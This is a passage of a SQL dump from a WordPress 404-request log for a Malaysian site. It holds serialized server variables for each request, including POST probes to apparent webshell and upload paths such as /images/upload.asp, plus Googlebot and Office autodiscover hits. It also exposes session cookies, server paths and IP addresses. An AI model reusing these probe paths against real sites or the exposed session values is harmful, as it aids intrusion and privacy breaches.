Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.85.34.105\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.85.34.105\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Templates/red.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Templates/red.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9Se4vBmywCERyagfmOwAAAQc\";s:12:\"REDIRECT_URL\";s:18:\"/Templates/red.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.166\";s:11:\"REMOTE_PORT\";s:5:\"53623\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Templates/red.asp\";s:10:\"SCRIPT_URL\";s:18:\"/Templates/red.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9Se4vBmywCERyagfmOwAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798346.1013\";s:12:\"REQUEST_TIME\";s:10:\"1571798346\";}}','notice','2019-10-23 02:39:08','2019-10-23 02:39:06',35341264,37145520,'http://bintara.com.my//Templates/red.asp',1,0,'211.85.34.105'),(28732,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//dede/inc/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"297\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.99.235.134\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.99.235.134\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/dede/inc/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/dede/inc/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa@9OuHARMCuuKQiJT-y@wAAAMk\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/dede/inc/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/dede/inc/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9OuHARMCuuKQiJT-y@wAAAMk\";s:12:\"REDIRECT_URL\";s:14:\"/inc/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.166\";s:11:\"REMOTE_PORT\";s:5:\"53077\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/dede/inc/index.php\";s:10:\"SCRIPT_URL\";s:19:\"/dede/inc/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9OuHARMCuuKQiJT-y@wAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798330.6181\";s:12:\"REQUEST_TIME\";s:10:\"1571798330\";}}','notice','2019-10-23 02:38:52','2019-10-23 02:38:51',35272344,37081880,'http://bintara.com.my//dede/inc/index.php',1,0,'218.99.235.134'),(28731,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/upload.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.98.253.62\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.98.253.62\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/upload.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9MuHARMCuuKQiJT-y@QAAAMM\";s:12:\"REDIRECT_URL\";s:18:\"/images/upload.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.166\";s:11:\"REMOTE_PORT\";s:5:\"53077\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/upload.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9MuHARMCuuKQiJT-y@QAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798322.6915\";s:12:\"REQUEST_TIME\";s:10:\"1571798322\";}}','notice','2019-10-23 02:38:44','2019-10-23 02:38:43',35265200,37068160,'http://bintara.com.my//images/upload.asp',1,0,'211.98.253.62'),(28730,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/upload.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.192.209.222\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.192.209.222\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/upload.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9I9aMiBShLW1lPtcO3AAAAAE\";s:12:\"REDIRECT_URL\";s:18:\"/images/upload.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.166\";s:11:\"REMOTE_PORT\";s:5:\"52658\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/upload.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/upload.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9I9aMiBShLW1lPtcO3AAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798308.1226\";s:12:\"REQUEST_TIME\";s:10:\"1571798308\";}}','notice','2019-10-23 02:38:30','2019-10-23 02:38:28',35342592,37145904,'http://bintara.com.my//images/upload.asp',1,0,'220.192.209.222'),(28729,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//admin/inc/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.205.178.126\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.205.178.126\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/admin/inc/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/admin/inc/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9HK6CYj3S7An3VFFcCQAAAUc\";s:12:\"REDIRECT_URL\";s:20:\"/admin/inc/index.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.166\";s:11:\"REMOTE_PORT\";s:5:\"52471\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/admin/inc/index.asp\";s:10:\"SCRIPT_URL\";s:20:\"/admin/inc/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9HK6CYj3S7An3VFFcCQAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798300.4172\";s:12:\"REQUEST_TIME\";s:10:\"1571798300\";}}','notice','2019-10-23 02:38:23','2019-10-23 02:38:20',35270832,37068776,'http://bintara.com.my//admin/inc/index.asp',1,0,'220.205.178.126'),(28728,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/maxbuttons/js/min/front.js?ver=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-US\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:314:\"wp_woocommerce_session_98154e5ffae2b44b325706407b2cee5a=4a8bd128221683d2ac36cfd19be05db2%7C%7C1536130416%7C%7C1536126816%7C%7C251549e297a6cad214514118b6804394; yith_ywraq_session_98154e5ffae2b44b325706407b2cee5a=17b2c6716bab5f199204e67d0e8e72b6%7C%7C1536130417%7C%7C1536126817%7C%7Cb8cc14813101251926f10cd7de3abfa3\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:50:\"http://bintara.com.my/markup-text-alignment/blog2/\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa@yZa6CYj3S7An3VFFUmwAAAVY\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@yZa6CYj3S7An3VFFUmwAAAVY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"62471\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa@yZa6CYj3S7An3VFFUmwAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571795557.8539\";s:12:\"REQUEST_TIME\";s:10:\"1571795557\";}}','notice','2019-10-23 01:52:39','2019-10-23 01:52:38',33811040,34168856,'https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js?ver=1',1,0,'66.249.71.30'),(28727,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/maxbuttons/js/min/front.js?ver=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-US\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:314:\"wp_woocommerce_session_98154e5ffae2b44b325706407b2cee5a=4a8bd128221683d2ac36cfd19be05db2%7C%7C1536130416%7C%7C1536126816%7C%7C251549e297a6cad214514118b6804394; yith_ywraq_session_98154e5ffae2b44b325706407b2cee5a=17b2c6716bab5f199204e67d0e8e72b6%7C%7C1536130417%7C%7C1536126817%7C%7Cb8cc14813101251926f10cd7de3abfa3\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:50:\"http://bintara.com.my/markup-text-alignment/blog2/\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa@yXuHARMCuuKQiJT-uXwAAAM4\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@yXuHARMCuuKQiJT-uXwAAAM4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"40532\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa@yXuHARMCuuKQiJT-uXwAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571795550.1319\";s:12:\"REQUEST_TIME\";s:10:\"1571795550\";}}','notice','2019-10-23 01:52:31','2019-10-23 01:52:30',33811040,34168856,'https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js?ver=1',1,0,'66.249.71.30'),(28726,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8EF65F94-62A3-4CB0-8DAF-F4A615C4018B\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@x0OHARMCuuKQiJT-uIAAAANU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"183.171.107.198\";s:11:\"REMOTE_PORT\";s:5:\"50431\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa@x0OHARMCuuKQiJT-uIAAAANU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571795408.3043\";s:12:\"REQUEST_TIME\";s:10:\"1571795408\";}}','notice','2019-10-23 01:50:10','2019-10-23 